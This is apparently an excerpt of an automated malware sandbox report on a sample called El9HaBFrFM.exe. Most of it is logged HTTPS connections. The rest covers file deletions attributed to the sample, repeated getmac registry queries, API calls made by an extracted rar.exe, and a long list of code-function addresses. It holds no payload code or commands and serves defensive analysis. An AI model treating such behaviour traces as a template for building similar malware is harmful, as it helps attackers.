              Source: unknownNetwork traffic detected: HTTP traffic on port 51421 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51405
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51406
              Source: unknownNetwork traffic detected: HTTP traffic on port 51383 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51403
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51404
              Source: unknownNetwork traffic detected: HTTP traffic on port 51360 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51409
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51407
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51408
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51401
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51522
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51402
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51523
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51520
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51400
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51521
              Source: unknownNetwork traffic detected: HTTP traffic on port 51476 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51499 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51409 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51315 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51443 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51514 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51290 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51420 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51416
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51417
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51414
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51415
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51418
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51419
              Source: unknownNetwork traffic detected: HTTP traffic on port 51267 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51338 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51412
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51413
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51410
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51411
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51454 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51394 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51349 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51278 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51386
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51266
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51387
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51263
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51384
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51264
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51385
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51269
              Source: unknownNetwork traffic detected: HTTP traffic on port 51507 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51267
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51388
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51268
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51389
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51390
              Source: unknownNetwork traffic detected: HTTP traffic on port 51451 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51272
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51393
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51273
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51394
              Source: unknownNetwork traffic detected: HTTP traffic on port 51474 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51497 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51270
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51391
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51271
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51392
              Source: unknownNetwork traffic detected: HTTP traffic on port 51279 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51256 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51313 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51439 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51382 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51462 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51276
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51397
              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51277
              Source: unknownNetwork traffic detected: HTTP traffic on port 51301 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51398
              Source: unknownNetwork traffic detected: HTTP traffic on port 51244 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51274
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51395
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51275
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51396
              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51278
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51399
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51279
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51280
              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51283
              Source: unknownNetwork traffic detected: HTTP traffic on port 51347 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51284
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51281
              Source: unknownNetwork traffic detected: HTTP traffic on port 51371 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51282
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51404 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51438 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51280 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51287
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51288
              Source: unknownNetwork traffic detected: HTTP traffic on port 51325 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51285
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51286
              Source: unknownNetwork traffic detected: HTTP traffic on port 51450 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51268 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51289
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51290
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51291
              Source: unknownNetwork traffic detected: HTTP traffic on port 51393 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51294
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51295
              Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51292
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51293
              Source: unknownNetwork traffic detected: HTTP traffic on port 51370 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51405 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51518 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51416 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51359 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51298
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51299
              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51296
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51297
              Source: unknownNetwork traffic detected: HTTP traffic on port 51427 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51475 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51314 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51291 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51461 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51257 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
              Source: unknownNetwork traffic detected: HTTP traffic on port 51381 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51348
              Source: unknownNetwork traffic detected: HTTP traffic on port 51417 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51469
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51349
              Source: unknownNetwork traffic detected: HTTP traffic on port 51484 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51342
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51463
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51343
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51464
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51340
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51461
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51341
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51462
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51346
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51467
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51347
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51468
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51344
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51465
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51345
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51466
              Source: unknownNetwork traffic detected: HTTP traffic on port 51369 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51323 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51470
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51350
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51471
              Source: unknownNetwork traffic detected: HTTP traffic on port 51346 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51292 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:51254 version: TLS 1.2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ??? ? ?\Common Files\Desktop\YPSIACHYXW.pngJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ??? ? ?\Common Files\Desktop\DVWHKMNFNN.mp3Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ??? ? ?\Common Files\Desktop\VLZDGUKUTZ.docxJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ??? ? ?\Common Files\Desktop\DVWHKMNFNN.pdfJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ??? ? ?\Common Files\Desktop\DVWHKMNFNN.xlsxJump to behavior
              Source: cmd.exeProcess created: 59

              System Summary

              barindex
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EED2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,83_2_00007FF6D7EED2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F1B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,83_2_00007FF6D7F1B57C
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3C69640_2_00007FF6BA3C6964
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3A89E00_2_00007FF6BA3A89E0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3A10000_2_00007FF6BA3A1000
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3B1B500_2_00007FF6BA3B1B50
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3C5C000_2_00007FF6BA3C5C00
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3B2C100_2_00007FF6BA3B2C10
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3C3C100_2_00007FF6BA3C3C10
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3C08C80_2_00007FF6BA3C08C8
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3C64180_2_00007FF6BA3C6418
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3AACAD0_2_00007FF6BA3AACAD
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3AA4740_2_00007FF6BA3AA474
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3B5D300_2_00007FF6BA3B5D30
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3B39A40_2_00007FF6BA3B39A4
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3B19440_2_00007FF6BA3B1944
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3B21640_2_00007FF6BA3B2164
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3BDA5C0_2_00007FF6BA3BDA5C
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3AA2DB0_2_00007FF6BA3AA2DB
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3B87940_2_00007FF6BA3B8794
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3B17400_2_00007FF6BA3B1740
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3B1F600_2_00007FF6BA3B1F60
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3A98000_2_00007FF6BA3A9800
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3C40AC0_2_00007FF6BA3C40AC
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3C18740_2_00007FF6BA3C1874
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3C08C80_2_00007FF6BA3C08C8
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3B80E40_2_00007FF6BA3B80E4
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3B35A00_2_00007FF6BA3B35A0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3B1D540_2_00007FF6BA3B1D54
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3BE5700_2_00007FF6BA3BE570
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3C5E7C0_2_00007FF6BA3C5E7C
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3B9EA00_2_00007FF6BA3B9EA0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3C97280_2_00007FF6BA3C9728
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3BDEF00_2_00007FF6BA3BDEF0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3C69641_2_00007FF6BA3C6964
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3A10001_2_00007FF6BA3A1000
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3B1B501_2_00007FF6BA3B1B50
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3C5C001_2_00007FF6BA3C5C00
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3B2C101_2_00007FF6BA3B2C10
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3C3C101_2_00007FF6BA3C3C10
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3C08C81_2_00007FF6BA3C08C8
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3C64181_2_00007FF6BA3C6418
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3AACAD1_2_00007FF6BA3AACAD
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3AA4741_2_00007FF6BA3AA474
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3B5D301_2_00007FF6BA3B5D30
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3B39A41_2_00007FF6BA3B39A4
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3B19441_2_00007FF6BA3B1944
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3B21641_2_00007FF6BA3B2164
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3A89E01_2_00007FF6BA3A89E0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3BDA5C1_2_00007FF6BA3BDA5C
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3AA2DB1_2_00007FF6BA3AA2DB
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3B87941_2_00007FF6BA3B8794
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3B17401_2_00007FF6BA3B1740
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3B1F601_2_00007FF6BA3B1F60
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3A98001_2_00007FF6BA3A9800
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3C40AC1_2_00007FF6BA3C40AC
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3C18741_2_00007FF6BA3C1874
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3C08C81_2_00007FF6BA3C08C8
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3B80E41_2_00007FF6BA3B80E4
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3B35A01_2_00007FF6BA3B35A0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3B1D541_2_00007FF6BA3B1D54
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3BE5701_2_00007FF6BA3BE570
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3C5E7C1_2_00007FF6BA3C5E7C
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3B9EA01_2_00007FF6BA3B9EA0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3C97281_2_00007FF6BA3C9728
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3BDEF01_2_00007FF6BA3BDEF0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFA9E03501_2_00007FFDFA9E0350
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFA9313001_2_00007FFDFA931300
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFA9322701_2_00007FFDFA932270
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFA9319501_2_00007FFDFA931950
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAF5C001_2_00007FFDFAAF5C00
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAADBAE01_2_00007FFDFAADBAE0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAF9A601_2_00007FFDFAAF9A60
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB155A1_2_00007FFDFAAB155A
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB16541_2_00007FFDFAAB1654
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB21C61_2_00007FFDFAAB21C6
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB13DE1_2_00007FFDFAAB13DE
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAB77A201_2_00007FFDFAB77A20
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB15961_2_00007FFDFAAB1596
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAFD9801_2_00007FFDFAAFD980
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB15461_2_00007FFDFAAB1546
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB1AD71_2_00007FFDFAAB1AD7
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAD60301_2_00007FFDFAAD6030
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB1FDC1_2_00007FFDFAAB1FDC
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAFDE501_2_00007FFDFAAFDE50
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB21E41_2_00007FFDFAAB21E4
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB17F81_2_00007FFDFAAB17F8
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAB1D2D01_2_00007FFDFAB1D2D0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB27021_2_00007FFDFAAB2702
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB24DC1_2_00007FFDFAAB24DC
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB1C121_2_00007FFDFAAB1C12
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAB236501_2_00007FFDFAB23650
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB1A0F1_2_00007FFDFAAB1A0F
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB26171_2_00007FFDFAAB2617
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB1EE21_2_00007FFDFAAB1EE2
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAE89201_2_00007FFDFAAE8920
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAB288701_2_00007FFDFAB28870
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB16181_2_00007FFDFAAB1618
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB117C1_2_00007FFDFAAB117C
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB149C1_2_00007FFDFAAB149C
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB1CBC1_2_00007FFDFAAB1CBC
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAB2AC801_2_00007FFDFAB2AC80
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB1B541_2_00007FFDFAAB1B54
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB1D931_2_00007FFDFAAB1D93
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB87201_2_00007FFDFAAB8720
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB116D1_2_00007FFDFAAB116D
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB16FE1_2_00007FFDFAAB16FE
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0890601_2_00007FFDFB089060
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB144C701_2_00007FFDFB144C70
